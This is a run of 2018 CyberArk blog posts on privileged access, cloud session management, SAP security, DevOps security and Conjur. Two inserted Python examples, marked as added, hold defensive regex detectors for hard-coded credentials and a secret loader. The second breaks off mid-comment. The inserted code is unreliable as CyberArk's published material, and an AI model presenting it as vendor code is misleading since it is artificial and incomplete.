To learn more about how CyberArk can help your healthcare organization protect its investments, simplify compliance and continue to deliver the highest quality patient care, read more on our website here.

The Privileged Access Problem: GAO Report Points to Vulnerabilities in Pentagon’s Advanced Weapon Systems https://www.cyberark.com/blog/the-privileged-access-problem-gao-report-points-to-vulnerabilities-in-pentagons-advanced-weapon-systems/ Fri, 26 Oct 2018 13:02:10 +0000 https://www.cyberark.com/?p=30182/

The Government Accountability Office (GAO) recently released a scathing report highlighting the critical vulnerabilities that malicious attackers could exploit to take complete control of Defense Department advanced weapon systems. Many of the findings point to poor privileged access security practices – a major underlying problem that has long existed throughout federal IT infrastructure.

The failure to secure privileged access is at the heart of the most damaging security breaches. It’s absolutely critical that agencies and the organizations they do business with lock down privileged access, which includes credentials and accounts.

I wrote a piece for GCN outlining three steps agencies should take to better protect their most sensitive credentials and strengthen their overall security posture. Following are some excerpts:

  • Admit there’s a problem. In the last three years, the GAO has issued multiple reports that indicated an agency or system had pervasive problems with privileged access security. The Office of Management and Budget (OMB) issued its own report in April in partnership with the Department of Homeland Security (DHS), revealing that only 55 percent of agencies limit access based on user attributes and roles – and only 57 percent review and track administrative privileges at all. The first step to better security is understanding – and admitting – there’s a problem. Then taking action.
  • Change default passwords. Default passwords are the factory-set passwords for the administrative accounts of a system. They exist so that developers and administrators can easily set up a technology ‘out of the box,’ and they exist everywhere – on home routers, networked printers and even advanced weapon systems. The Pentagon used off-the-shelf and open-source software with default passwords, but never changed them. As the GAO testers found out, default passwords are typically easy to find through a simple internet search – which means that not changing them is a failure of basic security hygiene.
  • Secure near-siders. While the Pentagon was able to prevent exploitation of the weapon system from remote users, it struggled in stopping potential insiders and near-siders (contractors and third parties who function as an insider with the same privileged access as someone inside the organization). Attackers seek both insider and near-siders to steal their access credentials and then escalate privileges until they’re able to take control of a system.

Establishing a strong security posture starts with ensuring good cyber hygiene, and securing these known vulnerabilities is a must. The privileged access problem is a clear and present threat, and the government simply can’t afford to wait for disaster to strike before addressing it.

Editor’s Note: Read the full GCN piece to delve deeper into the GAO report’s findings and explore ways agencies and government organizations can address the privileged access problem.

Privileged Session Manager for Cloud: Quite Possibly the Greatest Thing Since Sliced Bread https://www.cyberark.com/blog/privileged-session-manager-for-cloud-quite-possibly-the-greatest-thing-since-sliced-bread/ Thu, 25 Oct 2018 18:44:11 +0000 https://www.cyberark.com/?p=30174/

Editor’s Note: Privileged Session Manager for Cloud is now available as Privileged Session Manager for Web.

When first introduced, sliced bread delivered a new level of efficiency and revolutionized the kitchen for the average American family. It was positioned as “the greatest forward step in the baking industry since bread was wrapped.” Simply put, automating a very uncomplicated process immediately made people’s lives easier, enabling them to be more productive and focus their attention on more important things. A woman penned a letter to the New York Times back in the early 1940s stating the following:

“I should like to let you know how important sliced bread is to the morale and saneness of a household. My husband and four children are all in a rush during and after breakfast. Without ready-sliced bread I must do the slicing for toast—two pieces for each one—that’s ten. For their lunches I must cut by hand at least twenty slices, for two sandwiches apiece. Afterward I make my own toast. Twenty-two slices of bread to be cut in a hurry!”¹

Large enterprises searching for ways to become more operationally efficient while at the same time saving a bit of dough (pun), have naturally turned to the cloud to fuel digital transformation. We continue to see the shift from traditional on-premises infrastructure and applications to cloud and Software-as-a-Service (SaaS) platforms, with organizations aiming to take advantage of the agility and cost savings delivered by as-a-service approaches.

Cloud computing usage is no longer limited to things such as disaster recovery, business continuity, record retention or test and dev. It has expanded and evolved to include more mission and business-critical applications that help drive the success of the business. To realize these benefits, many organizations today exist in a hybrid model that requires integrating disparate cloud platforms, services and applications, and this presents a new set of enterprise-level challenges. To adequately protect this increasingly complex network of applications and systems, organizations also need a unified privileged access security approach to reduce risk from external attackers and malicious insiders, while maximizing operational efficiency and end-user productivity.

Introducing CyberArk Privileged Session Manager for Cloud

We are happy to announce our version of the greatest thing since sliced bread. We know it’s the most overused hyperbole to describe innovation, but this time, it’s truly the case as it relates to operational efficiency and security.

Here’s why.

Over the past year, CyberArk has made an orchestrated effort to simplify the way privileged access security is delivered and experienced. Privileged Session Manager for Cloud, part of the CyberArk Core Privileged Access Security Solution, takes it one step further by enabling our customers to deliver ease of access and security without compromise, bridging the gap between operational challenges and a sound security posture.

Cloud administrators and privileged business users may not have to tediously cut 22 slices of bread as part of their daily routine – but – they face many other obstacles in performing their jobs, such as console fatigue as they try to enforce security policies across a growing number of systems. CyberArk takes this burden away, making access both easy and secure. Secure access is implemented transparently for the end user with no change to the application required. In fact, end users can experience a 3X faster connection to cloud platforms and web applications compared to traditional session management solutions. Additionally, this milestone makes CyberArk the first and only privileged access security vendor to deliver native access for cloud platforms, SaaS and social media applications.


Security and audit teams now have complete visibility of cloud admin and privileged user activities. The solution provides an application-aware architecture that can observe user interactions within both cloud platforms and web applications, detect and alert on potential attacks in the event of high-risk or malicious activity, and create a detailed audit of all session activities. Through integration with Privileged Threat Analytics, the solution’s customizable risk scoring allows organizations to pre-define high-risk activity and assign it to privileged activity in real time. By assigning risk-based scoring to privileged sessions, audit teams can prioritize and streamline the audit review process based on risk versus randomly reviewing privileged sessions in hopes of catching something high-risk or malicious. The solution provides a single pane of glass view to prevent and detect attacks involving privileged access across on-premises, hybrid and cloud environments; and also integrates with leading Security Information and Event Management (SIEM) platforms.

Take the Next Step Forward in Securing Privileged Access

The best part about announcing Privileged Session Manager for Cloud is that it’s a free and complimentary solution for all existing customers with Core Privileged Access Security user licenses! For full release details, existing customers can access the release notes and download Privileged Session Manager for Cloud directly from the CyberArk Support Vault.

1. Forrester, Sue (January 26, 1943). “Ready-Sliced Bread Favored”. The New York Times. p. 8.
]]>
ERP Attacks Are On The Rise: Protect Against Insider Threats and External Attacks Across Business Critical Systems https://www.cyberark.com/blog/erp-attacks-are-on-the-rise-protect-against-insider-threats-and-external-attacks-across-business-critical-systems/ Tue, 23 Oct 2018 13:56:11 +0000 https://www.cyberark.com/?p=30143/

Organizations rely heavily on Enterprise Resource Planning (ERP) systems and applications to power their businesses, manage critical processes (product lifecycle management, customer relationship management, supply chain management, etc.) and ensure a continuous, open flow of information. The ubiquity of these systems and business critical applications means the potential to compromise data and expose organizations to compliance and regulatory consequences is greater than ever before.

Earlier this year, US-CERT and others warned organizations worldwide about ongoing and imminent cyber attacks targeting ERP applications. Reuters reported that ERP systems across numerous media, energy and finance organizations were hit after they failed to install patches or take other security measures. Criminal hackers are not the only ones targeting these systems. Nation-state sponsored attackers also target ERP systems and applications for cyber espionage and sabotage, as evidenced in the high-profile United States Information Service (USIS) breach.

It’s easy to understand why these types of attacks are on the rise. ERP systems and applications house sensitive, business-critical data that is highly attractive to attackers. They are also pervasive, touching virtually every layer of a business – from infrastructure to operating systems to cloud consoles and more. In these environments, default, generic passwords are rampant; strong authorizations are often shared by multiple employees (such as admin groups); and the associated passwords are too often widely known throughout the organization. This makes it very difficult to control where powerful credentials are used – and for what purpose. In-depth auditing of privileged logons to such ERP systems is often hard to configure or runs into other challenges, such as performance issues. Because many of the applications these complex systems support are Internet-facing to facilitate data flow across multiple audiences and third-party entities, attackers constantly find new ways to exploit vulnerabilities to gain privileged access and disrupt operations.

CyberArk Privileged Access Security Solution for SAP

Today, more than 91 percent of the Forbes 2000, as well as the most valued global brands and government agencies, rely on enterprise management software leader SAP for the modern business tools needed to run their businesses and help predict the future needs of their customers. As SAP adoption continues to surge, there is a critical need for organizations to reduce the attack surface and manage privileged access. This is strongly evident when you consider that the average damage of an SAP breach is estimated at $5 million – a staggering cost to many organizations.

Although SAP has designed security measures to address common vulnerabilities and security risks, they are primarily based on SAP-specific use cases. These highly complex, high-touch systems require a great deal of time and manual work to maintain proper cyber hygiene – to the tune of 4,000+ security patches – making it nearly impossible for security teams to keep up. As a result, securing privileged access using native SAP tools creates additional operational complexity and often falls short of meeting security and compliance mandates.

In a recent On the Front Lines webinar, I highlighted CyberArk’s certified integration with SAP, powered by NetWeaver. With the industry’s only SAP-certified solution that helps organizations automatically discover, onboard and secure SAP accounts and credentials across all layers of the enterprise, organizations now have a way to better protect against insider and external attacks across their SAP environments, including SAP ERP systems.

If you missed the live discussion, I invite you to tune in to the on-demand presentation to learn how to stay one step ahead of attackers by:

  • Managing and securing SAP credentials: Strengthen your overall security posture and improve operational efficiencies by onboarding accounts directly into CyberArk. With CyberArk, you can also automate password rotation and enable multi-layered privileged access security controls across the SAP stack – from the application layer to databases, operating system and servers.
  • Reducing privileged access security risk: Quickly detect and halt suspicious activity by monitoring SAP privileged user activity. CyberArk complements SAP’s security controls by managing, protecting and controlling the use of privileged accounts. CyberArk provides a consistent approach to reducing privileged access security risk across the entire enterprise for SAP solutions and other high-value applications and infrastructure.

For additional information check out the CyberArk Marketplace or download our solution brief and whitepaper.

]]>
Overcoming DevOps Security Blind Spots: A Q&A with Forrester’s Chris Condo https://www.cyberark.com/blog/overcoming-devops-security-blind-spots-a-qa-with-forresters-chris-condo/ Wed, 17 Oct 2018 14:11:12 +0000 https://www.cyberark.com/?p=30041/

We recently hosted a webinar, with special guest Chris Condo of Forrester Research, to help security professionals better understand the challenges developers face in the lightning-fast-paced DevOps world – and to explain how they can fully embed themselves into the DevOps process. We received a number of thoughtful questions during the Q&A portion of the webinar. Following are some highlights from this interactive discussion.

Q: Throughout the webinar, we discussed the importance of security taking on a services role. This service responsibility concept is very important as we think about how different groups and multi-disciplinary teams can interact with one another. How do you see service responsibility breaking out for application-level security concerns?

Chris: What the “you write it, you own it” mentality really means is that it’s security’s job to empower the development team by helping them to fully understand what the threats are and educate them – not just on the architecture – but also on how they will host each particular application. They need to understand how it’s going to be secured, how to deploy the code to that machine, etc.

At one time, you might have had a person on the operations team who pushed code out to a server based on a list of written instructions (here’s how to configure the server, here’s how to load the software package, etc.) and expected things to work magically. But of course, this never works. What’s transformed from that era is that the development team has taken on a true ownership role, because security and infrastructure folks realize that they [the development team] are the ones who truly know the application best.

What I see working best is when development kicks off a project by engaging the security team, saying, “Hey, I’m going to develop this product, it needs to be delivered in six months and I need to get your insights on what we should be doing along each step of the way.”

Q: What should those initial conversations between DevOps and security teams look like?

Chris: There are a host of questions about what goes into product development that developers don’t necessarily know to ask initially. Therefore, it’s important that security is involved to walk through those questions from the start. For example, the first thing that should be addressed is what kind of data will be stored. Who’s going to use it, and in which geographies? How many people are going to use the product? What kind of technologies are used to build the application? Are contractors involved? Is the product going to be developed in other countries, outside of the United States, for example? Who’s the customer?

Then, as development gets closer to delivery, it’s important to address questions such as, how is the application going to be hosted? What’s that going to take? How many servers are needed? Then, close collaboration with security is necessary to address network security and infrastructure security requirements. Sit down together and have a discussion about how the application is evolving and what needs to happen. Lean on the security team as you would a consultant or advisory team – look to them for best practices and proven advice.

Q: How does automation play into this collaborative approach?

Chris: Automation makes parts of the code development process more opaque. It means that somebody could insert code that shouldn’t be there. It also allows teams to do things undercover that at one time (when the coding process was manual) would have been very transparent, such as an automated deployment to a test environment.

That’s why it’s so important that the DevOps team (or whoever owns building that DevOps chain) consults with the security team upfront, letting them know what they are doing, showing them which tools require which types of privileges to run and confirming what needs to happen when a particular CI tool requires admin access, for example. You need to be proactive and start thinking about how to isolate those tools if they can’t be replaced with any other tool, or how to build other types of methodologies, so that the methodology used to build the software is also secure.

Q: Where do you see security budgets, efforts and mandates coming from? Is it coming from within the line of business? Is it more central? And how do you see that playing out in terms of how companies address security problems?

Chris: What often happens within these distributive models is that everyone adopts the attitude of, “Well, I own my own DevOps tool chain, so I’ll do what I want.” The reason why they feel like they can do that is because they don’t own the responsibility for security or the execution of security principles. They simply leave it to security to be the heavy-handed person who comes in at the end and says, “Oh, hold on a minute, let’s put on the brakes and go through all these checklists.” That’s when you end up in a standoff. Instead, the CIO or CTO should say, “Listen development team, if a security feature goes out the door and you break some sort of policy, it’s on you. You need to be the holders of the security execution. The security team is going to tell you what you need to do, but it’s your job to get it done.”

Successful teams often establish a center of excellence. They pull experts from various teams – similar to the Spotify Guild strategy – to meet with some frequency and discuss best practices to collaboratively find solutions that can provide both speed and security.

Q: Any closing thoughts?

Chris: An essential first step is getting executive buy-in to the fact that security and development is a joint process and conveying the value of incorporating security upfront and throughout the entire development process. The sooner security’s voice is heard, the less expensive the project is actually going to be.

Editor’s Note: These responses have been edited for clarity and brevity. You can tune in to the webinar recording to watch the full presentation or check out additional highlights in this blog post.

]]>
Introducing Privileged Session Manager for the Cloud https://www.cyberark.com/blog/introducing-privileged-session-manager-for-the-cloud/ Mon, 15 Oct 2018 13:03:51 +0000 https://www.cyberark.com/?p=29879/

Editor’s Note: Privileged Session Manager for Cloud is now available as Privileged Session Manager for Web.

As founder and CTO of Vaultive, I’ve worked closely with a team of brilliant engineers over the past 10 years to address the most pressing security issues that prevent enterprises from fully realizing the promise of the cloud – from data security and regulatory compliance concerns to government data access and international data privacy laws.

The idea behind Vaultive’s technology came to me back in 2008. Always fascinated by computer networks and information security challenges, I identified the dawn of cloud computing as a huge challenge to enterprises that have to deal with very sensitive information and operate in regulated industries.

In my role, I had the privilege of running the Israeli development site. We have been through a fascinating and challenging journey together. This wonderful group of people also happens to have some of the sharpest minds I’ve ever had the pleasure of working with.

A guiding principle for me as a security professional has always been that security controls are only effective if they are transparent. End-users need to be efficient and able to get work done. Enterprises that implement security solutions that slow employees down may be improving overall security, but they are ultimately lowering productivity and creating frustrated employees who will look for ways around controls that create yet another set of security risks. We have always believed in empowering users to utilize as many modern devices and applications as they want.

Though many companies have set out to solve the cloud security conundrum, Vaultive approached the challenge with unmatched ambition, industry experience and technical innovation. Our unique technology allowed our clients to enforce policies such as authenticating users and auditing usage in cloud applications while still preserving a seamless, responsive and modern cloud application experience for users. This groundbreaking approach helped risk-conscious IT teams, from Wall Street firms,  Fortune 500 companies, large NGOs and others, move to the cloud securely and with confidence.

Having crossed paths with some of the CyberArk leadership team, I knew this company was different. Many companies build great products, but very few have the special culture that CyberArk does. In March of 2018, CyberArk decided to acquire my team and our technology. I knew we had a great opportunity ahead of us. There was a rare fit between what Vaultive had produced and the CyberArk product line, but we also knew we had to bring people together and not just technology. Although we were the new guys and gals, we were immediately embraced by CyberArk. The Vaultive and CyberArk teams united seamlessly – across geographies, organizations and product groups – driven by an aligned vision to deliver an effective, proactive and unified security approach that extends from the data center to the cloud. Since March, we have been hard at work fully integrating the Vaultive technology into the CyberArk Privileged Access Security Solution, which I am thrilled to introduce today with the launch of Privileged Session Manager for Cloud.

CyberArk Privileged Session Manager for Cloud, a core component of the CyberArk Privileged Access Security Solution, enables IT security teams to isolate, monitor and control access consistently across multiple cloud platforms and web-based applications – all without changing or hindering the way cloud administrators and privileged business users work.

With Privileged Session Manager for Cloud, security teams can provide transparent access to AWS, Red Hat OpenShift, Salesforce.com, and leading social media platforms – Twitter, LinkedIn, Facebook and Instagram – that is 3x faster than traditional session management solutions. Integration with the CyberArk Privileged Access Security Solution’s threat analytics capabilities means that security teams now have visibility into risky activities on these sensitive platforms to help alert on attacks in flight. Detailed audits of admin and privileged user activities mean less time spent meeting compliance requirements. All of this translates into a win-win for the security team and for end users!

I’m extremely proud of everything the Vaultive engineering team accomplished from our humble beginnings in our offices in downtown Tel Aviv where we initially had more dogs than human team members. I am also honored to share our first major deliverable as part of the CyberArk family. We look forward to working closely with customers around the world to proactively protect against advanced threats and extend their privileged account security strategies to the cloud.

For more information on Privileged Session Manager for Cloud, I encourage you to check out today’s news announcement, register for our customer webinar or contact your CyberArk representative. Be sure to watch this space – we’ve only just begun!

On a personal note, I feel extremely proud of what the extended engineering team has achieved over the years. A few days ago we received the terrible news that one of our top engineers, Ryan Barberides, had tragically passed away. Ryan was a sharp, gentle, intelligent and hard-working young man who we all deeply loved. We would not be here without him, and I send my deep condolences to his family and friends. We will all miss you, Ryan!

]]>
Cyber Security Awareness Month: Highlights of Three Pathways into a Cyber Career https://www.cyberark.com/blog/cyber-security-awareness-month-highlights-of-three-pathways-into-a-cyber-career/ Fri, 12 Oct 2018 12:58:08 +0000 https://www.cyberark.com/?p=29864/

October is Cyber Security Awareness Month, and this week’s focus is on establishing or building a career in cyber security. There are many paths to consider. People find their way to careers in cyber security from a wide variety of backgrounds. At CyberArk, we have employees with backgrounds in finance, law, systems administration, operations and much more. In fact, many who took a less direct route to their career in cyber security find that the skills they learned along the way are the ones they depend on while working at CyberArk. In this article, we’ll profile three employees.

Noam Liran, National Manager of Federal Engineering and Customer Success at CyberArk, started his career in corporate finance, completed law school and then became a cyber security professional. He credits the perspective on business he got from his corporate finance career and the communication skills from his time at law school for his success in cyber security.

“Critical problem solving is often more important than ones and zeros,” Liran said. He works with CyberArk’s customers, educating them on CyberArk’s products, matching their needs to effective solutions, troubleshooting technical issues and acting as the customer’s main technical point of contact. He explained that when he addresses a room at one of his client’s offices, he’s dealing with a diverse group of people from both technical and business backgrounds.

He said, “You need to be able to address questions from different professionals. It’s hard to do if you can’t relate to them and answer with a level of detail and information that resonates with them.” His background in business helps him connect to the business professionals in ways someone from a straight engineering background often can’t. Liran said, “If you’re focused only on engineering, you lose track of what is important from a business perspective.” Liran’s diverse experience lets him speak to business or technical professionals in their own language.

Communication is key when it comes to working with customers to develop their cyber security capabilities. Liran’s time at law school helps him there. One of the biggest lessons of law school, according to Liran, is effective communication. A lawyer needs to be able to speak clearly and concisely to a wide variety of people while under pressure. From this, Liran learned how to address people from many different backgrounds, keep clients’ attention and answer even the trickiest of questions.

Liran doesn’t think that a cyber security or computer science degree is the most important thing for a cyber security professional. He said, “The ability to bring in both technical knowledge and communication skills is an effective combo that can make anyone successful.”

Liran stays in cyber security because he’s “making a difference.” He said, “I’m helping someone secure their environment, mitigate risk and lessen the impact of a breach to maintain an operational business and avoid disruptions for customers.”

Jeff Vealey, Customer Success Security Adviser at CyberArk, also loves his job in cyber security because it helps him to protect people. He said, “I really enjoy watching any spy or CIA show. I’ve always wanted to see how the CIA does things. I think that’s the epitome of security.”

Vealey came to cyber security from a career in network operations. He got involved in technology because no one else at his company had technical skills. Figuring out how to implement security at that company was his “trial by fire.” Vealey assists customers around the world, providing guidance on cyber security, solving security problems and helping companies to implement cyber security solutions. With his love of CIA shows, he’s made his specialty helping the federal government.

Vealey said that he sees “curiosity” as the most important trait for a cyber security professional. Curiosity about how things work is part of what makes him good at his job. He said, “I also love to tinker. I like to see if something works; if I throw something at it from another angle, will it still work?”

According to Vealey, cyber security is an exciting field to join now. He said, “It’s a hyper-growing field. There will always be a need for security since someone is always trying to get around it.”

His advice to anyone looking to enter cyber security is: “Don’t be afraid to start in operations.” He explained that cyber security can be a part of any operations job, providing hands-on experience in cyber security programs. Vealey added.

Andy Thompson, National Manager for Customer Success at CyberArk, got hands-on experience with cyber security working in operations and as a systems administrator before he became a cyber security professional. Now, he works with clients, helping them to implement privileged access security solutions, providing guidance on security best practices and consulting on IT risks.

Thompson credits his time as a systems administrator for his success in cyber security. He said, “My time ‘in the trenches’ provides me with credibility. I can relate to the challenges clients deal with because I faced those challenges myself. I feel like it allows me to understand how clients function internally and how to ask the right questions. My experience as a sysadmin is one of the reasons customers view me as a trusted adviser instead of just another vendor.”

Thompson recommends that anyone interested in becoming a cyber security professional, no matter their background, reach out and look for mentors. He said, “My career has been influenced by several people who took an active interest in me and I too have done the same.” He added, “The InfoSec community has always been willing to teach the willing.”

Now is a good time to get involved with cyber security. Thompson said, “Let’s face it, there will always be a need for InfoSec professionals in these crazy times.”

Privileged access security management is a sought-after skill set. If you’re interested in learning more, CyberArk offers free training and cyber security resources. You can also check out careers at CyberArk here.

]]>
CyberArk Conjur Open Source is Now Available on AWS Marketplace https://www.cyberark.com/blog/cyberark-conjur-open-source-is-now-available-on-aws-marketplace/ Fri, 28 Sep 2018 21:01:55 +0000 https://www.cyberark.com/?p=29121

We’re excited to announce that CyberArk Conjur Open Source is now available as an AMI (Amazon Machine Image) on Amazon Web Services (AWS) Marketplace. Conjur Open Source is a powerful secrets management solution tailored specifically to the unique infrastructure requirements of native cloud, container and DevOps environments.

The availability of Conjur Open Source further expands CyberArk’s offering on AWS Marketplace, which already includes the CyberArk Privileged Access Security Solution.

Integration with AWS IAM Improves Security

Conjur offers powerful integrations with AWS. For example, Conjur can improve AWS workload security by utilizing the native capabilities of AWS Identity and Access Management (IAM) roles for strong authentication and Conjur for policy-based authorization. Since Conjur-defined policies can be applied to pre-defined AWS IAM roles, this approach enables developers and security teams to avoid redoing work, which can slow down the development process. Conjur can authenticate any AWS principal, including AWS Elastic Compute Cloud (EC2) and AWS Elastic Container Service (ECS) instances, AWS Auto Scaling groups and Lambda functions. As a result, organizations using both AWS and CyberArk can manage access policies more securely across AWS, hybrid, multi-cloud and CI/CD pipelines.

Centralized Solution that Avoids the Limitations of Native Platforms and Tools

Conjur is designed to provide a centralized solution for secrets management, which helps developers to easily and consistently protect secrets, keys, certificates, and authentication data across the CI/CD pipeline, regardless of the varying capabilities of the underlying native tools and environments. Conjur Open Source integrates natively with leading container environments and native tools, including Kubernetes, Red Hat OpenShift and Cloud Foundry, as well as Jenkins, Chef, Puppet and Ansible.

Conjur was designed with ease of use for developers in mind. Its capabilities include machine identity and policy as code, as well as powerful security features such as centralized policy-based enforcement, segregation of duties, rotation and monitoring.

Easy to Start Securing Secrets

Conjur Open Source on AWS Marketplace gives developers an easy way to use Conjur to get hands-on experience removing secrets from their code and securing them. For example, Conjur lets developers automatically secure secrets in code that reads them from environment variables.
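As an added example, not part of the original post and not Conjur’s own code, the Python below shows the pattern this passage describes: a minimal check-in scan that flags credential literals embedded in source, and a fail-closed loader that reads the secret from an environment variable instead, so the scan passes once the literal is gone. The regex rules, function names and the two sample snippets are assumptions constructed for the demonstration; production scanners carry far larger rule sets.

```python
"""Added example (not CyberArk/Conjur code): a minimal check-in scan for
hard-coded credentials, plus the environment-variable loading pattern that
replaces them.  Rules and sample snippets are constructed for illustration."""
import os
import re

# Each rule is (name, compiled regex).  These three patterns are assumptions
# chosen for the demo, not an exhaustive ruleset.
SECRET_RULES = [
    # AWS access key IDs have a fixed "AKIA" prefix followed by 16 chars.
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    # A credential-like name assigned a quoted literal of 4+ characters.
    ("password_literal", re.compile(
        r"""(?i)(password|passwd|pwd|secret|api_key|token)\s*[:=]\s*['"][^'"]{4,}['"]""")),
    # PEM private key header pasted into source.
    ("private_key_block", re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----")),
]


def find_hardcoded_secrets(source):
    """Return [(line_number, rule_name), ...] for every line matching a rule."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern in SECRET_RULES:
            if pattern.search(line):
                findings.append((lineno, name))
    return findings


def check_in_gate(source):
    """True when the source is clean; a pre-commit hook would block the commit otherwise."""
    return not find_hardcoded_secrets(source)


def load_secret_from_env(name, environ=None):
    """Fail-closed lookup: the value must be injected via the environment (e.g. by a
    secrets manager); a missing or empty value is an error, never a silent default."""
    env = os.environ if environ is None else environ
    value = env.get(name)
    if not value:
        raise RuntimeError(f"required secret {name} is not set in the environment")
    return value


# Constructed 'before' snippet: credentials embedded directly in source.
BEFORE_SNIPPET = '''\
AWS_ACCESS_KEY_ID = "AKIAEXAMPLEEXAMPLE01"
db_password = "correct-horse-battery"
'''

# Constructed 'after' snippet: the same code pulls values from environment variables.
AFTER_SNIPPET = '''\
import os
AWS_ACCESS_KEY_ID = os.environ["AWS_ACCESS_KEY_ID"]
db_password = os.environ["DB_PASSWORD"]
'''

if __name__ == "__main__":
    for label, snippet in (("before", BEFORE_SNIPPET), ("after", AFTER_SNIPPET)):
        print(label, find_hardcoded_secrets(snippet), "passes gate:", check_in_gate(snippet))
```

The scan is line-oriented so findings can be reported with a line number in a pre-commit or CI step; the loader raises rather than falling back to a default so a misconfigured deployment fails at start-up instead of running with an empty credential.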

Flexible Upgrade to Enterprise-Class Capabilities

Conjur Open Source can be easily upgraded to Conjur Enterprise, which provides all the capabilities of Conjur Open Source plus full access to CyberArk support and can be integrated with the CyberArk Vault. Vault integration allows secrets and credentials managed by the CyberArk Vault to be automatically on-boarded to platforms integrated with Conjur, such as containers managed by Red Hat OpenShift or a Jenkins pipeline, enabling centralized policy-based rotation and audit across the enterprise.

Next Steps

Conjur Open Source is also available as a Kubernetes application on Google Cloud as well as on GitHub and other sites. For more information and tutorials on Conjur Open Source, visit Conjur.org and, for Conjur Enterprise, visit Cyberark.com/Conjur or contact CyberArk Sales.

To learn more about CyberArk support for the AWS community, visit https://www.Cyberark.com/aws/.

]]>
Embracing DevOps: What Security Teams Need to Know https://www.cyberark.com/blog/embracing-devops-what-security-teams-need-to-know/ Tue, 25 Sep 2018 12:55:01 +0000 https://www.cyberark.com/?p=28953

We’ve all read about credentials exposed via GitHub and other repositories. It’s clear organizations have security blind spots in DevOps that need to be addressed. Developers want velocity and too often see security as “getting in the way.” We recently held a webinar, featuring special guest speaker Forrester Senior Analyst Chris Condo, to explore the challenges developers face and collaborative ways security teams can help. Following are some highlights from this presentation.

What Good is Speed Without Security?

Chris shared a story of an organization that releases code within five minutes – from check-in, through an automated pipeline, to full deployment. This is becoming the norm as development teams feel the pressure to move faster. According to the Forrester Business Technographics Developer Survey 2018, the top priority for 40 percent of software development teams over the next 12 months relates to speed and automation. Additionally, 34 percent of software decision-makers say that introducing or expanding DevOps is a high or critical priority to create and improve customer-focused products faster and more efficiently.

If an organization releases code at breakneck speed and also inadvertently exposes credit card numbers, credentials or PII, what good is speed, really? Forrester’s research underscores this point, indicating that software vulnerabilities (exploits), web applications (SQL injection, cross-site scripting, remote file inclusion), and stolen credential use (logins, encryption keys) are the top three ways that external attacks are carried out.

The Security and Development Disconnect

Developers, IT operations staff and administrators require quick, easy workflows to do their jobs effectively. Therefore, they can’t be constrained by restrictive security policies that impede the velocity of the delivery pipeline. When it comes to working with these teams, Chris explained that security professionals must re-shape perspectives by shifting away from checklists and stop signs and focusing instead on educating teams about the potential negative impacts to the business – response/notification costs, employee productivity loss, lawsuits/settlements, regulatory fines, additional security and audit requirements and brand recovery costs. When and how they convey this information to development teams is equally important. Once security teams can communicate these ramifications within the context of the business, they can begin a more effective dialogue about embedding security knowledge and best practices into the software development process.

How Security Teams Can Work within DevOps

Chris shared a number of best practices for putting security right in the middle of the DevOps “Venn diagram” of lean product development, continuous delivery and effective culture and organization including:

  • Support product teams through education. One of the ways that development teams aim to gain traction is through integrated product teams, which are responsible not only for developing product features, but also for learning from their releases and continuously improving processes. They follow a “You Write It, You Own It” mantra – which means they also own security. Security teams should play an advisory role to these teams, providing guidance and educating them on threats and attack vectors.
  • Be part of product planning and design. During this initial phase, security teams should be heavily involved, asking questions and preemptively thinking through potential issues. Instead of prescribing fixes, they should advocate for proactive defense measures. This helps to ensure developers incorporate strong security into the whole product from the beginning – rather than bolting it on at the end.
  • Advise development on best practices for static code analysis. Security teams should also play a role in creating security checklists that development teams can build automation against. For example, if an organization needs to ensure that there are no hard-coded credentials in the software, or that it is protected against cross-site scripting, the security team should be front and center, offering recommendations on how to introduce scanning tools that can be part of the check-in process.
  • Define best practices for automated open source screening. Similarly, security teams should guide development on best practices for automating the screening of open source components, along with license management and patching schedules. By educating the development team on how to incorporate these tools directly into their software development process, it becomes natural for users to choose the right version of a particular piece of open source code – they know the lineage of that code, they know that it’s been patched and they receive updates automatically when the code needs to be patched.
  • Provide guidance for secure micro-service architectures. Though micro-service architectures help streamline processes and break down code, they also expand the attack surface significantly by introducing APIs and loose linkages between critical components. It’s essential that development and operational communities understand how API gateways can secure traffic flow and how proper network segmentation can isolate critical components, so they can make informed decisions around producing and delivering high-performing and highly secure micro-service architectures.
  • Advise infrastructure and operations (I&O) teams to create secure environments using Infrastructure-as-Code (IaC) that is repeatable and verifiable. It’s security’s job to uncover wasteful processes and advise I&O on areas ripe for automation — then provide counsel on available tools that will allow them to embed security rules right into the infrastructure definition language that gets checked in, version controlled and pushed through an automation engine. It’s also security’s responsibility to advise I&O teams on best practices for creating secure containers at each layer: container orchestration, container network segmentation, container user access, the host operating system and the container run-time environment.
  • Work with development to create secure DevOps platforms. By providing education on what types of best practices development teams should be implementing, what kinds of environments they need to be building and what types of issues they need to look out for, security can help development streamline vendor and product evaluations. And with this guidance and enhanced visibility into applications’ access points and code, development teams can more confidently answer key questions such as, “Are we releasing the code that we intend to release? And, is there anything extra in here that we shouldn’t be releasing?”
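Two of the points above, scanning for hard-coded credentials at check-in and embedding security rules in the infrastructure definition that gets checked in, come down to a gate that runs before a change is merged. The following Python is an added example written for this article, not code from the presentation or from CyberArk: the rule set, the entropy threshold, the JSON resource format standing in for an infrastructure definition language, and the sample files are all constructed for illustration.

```python
import json
import math
import re
from collections import Counter

# Credential patterns, constructed for this example (a real scanner carries a
# much larger, maintained rule set).
CREDENTIAL_RULES = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(
        r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"),
    # name = "value" assignments where the name looks like a secret
    "password_assignment": re.compile(
        r"(?i)(?:password|passwd|pwd|secret|api_key|token)\s*[:=]\s*"
        r"['\"]([^'\"]{8,})['\"]"),
}

def shannon_entropy(s):
    """Bits per character: random-looking secrets score high, words score low."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def scan_for_credentials(path, text, entropy_threshold=3.5):
    """Return (path, line_no, rule) for each suspected hard-coded credential."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for rule, pattern in CREDENTIAL_RULES.items():
            match = pattern.search(line)
            if not match:
                continue
            if rule == "password_assignment":
                value = match.group(1)
                # Skip runtime-injected placeholders and low-entropy dummy values.
                if value.startswith("${") or shannon_entropy(value) < entropy_threshold:
                    continue
            findings.append((path, line_no, rule))
    return findings

# Infrastructure rules over a constructed JSON resource list, standing in for
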